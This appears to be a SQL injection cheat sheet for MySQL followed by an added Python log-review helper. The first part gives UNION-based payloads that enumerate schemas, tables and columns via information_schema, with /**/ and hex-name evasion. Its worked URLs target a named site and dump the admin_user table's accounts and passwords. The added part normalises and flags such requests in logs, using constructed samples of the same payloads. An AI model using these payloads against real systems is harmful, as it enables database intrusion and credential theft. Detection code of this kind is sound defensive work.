Enumerating databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerating tables
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerating columns
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:
1. Dumping table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
(0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet.)
Enumerating this way, the admin_user table appears at the fourth result.

2. Dumping column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dumping passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
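
Added example (not part of the original post): a Python log-review helper that undoes the two disguises used in the requests above, the /**/ comments standing in for spaces and the hex-encoded schema and table names, then classifies the query string. The function names, verdict labels and sample query strings (parameter id, value 7) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # the /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
META_TABLE = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)

def normalize(query_string):
    """URL-decode, replace inline comments with spaces, collapse whitespace."""
    text = INLINE_COMMENT.sub(" ", unquote_plus(query_string))
    return re.sub(r"\s+", " ", text).strip()

def inspect(query_string):
    """Classify one query string and decode identifiers hidden as hex literals."""
    text = normalize(query_string)
    tables = sorted({t.lower() for t in META_TABLE.findall(text)})
    names = []
    for digits in HEX_LITERAL.findall(text):
        decoded = bytes.fromhex(digits).decode("latin-1")
        # Skip one-byte separators such as 0x7c; keep printable names only.
        if len(decoded) > 1 and decoded.isprintable():
            names.append(decoded)
    if not UNION_SELECT.search(text):
        verdict = None
    elif tables:
        verdict = "schema-enumeration"
    else:
        verdict = "union-select"
    return {"verdict": verdict, "metadata_tables": tables, "hex_names": names}

# Constructed query strings in the shapes shown above (parameter and id are made up).
SAMPLES = [
    "id=7",
    "id=7/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/"
    "information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "id=7%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1,COLUMN_NAME,3%2F%2A%2A%2Ffrom%2F%2A%2A%2F"
    "information_schema.COLUMNS%2F%2A%2A%2Fwhere%2F%2A%2A%2FTABLE_NAME=0x61646D696E5F75736572",
    "id=7/**/and/**/1=2/**/union/**/select/**/1,concat(0x7c,ID,0x7c,ACCOUNT,0x7c),3/**/"
    "From/**/admin_user/**/limit/**/0,1/*",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(inspect(qs))
```

A "union-select" verdict on its own can also fire on ordinary search text containing those two words, so treat it as a lead for review; "schema-enumeration" with decoded names shows which database objects the request was asking about.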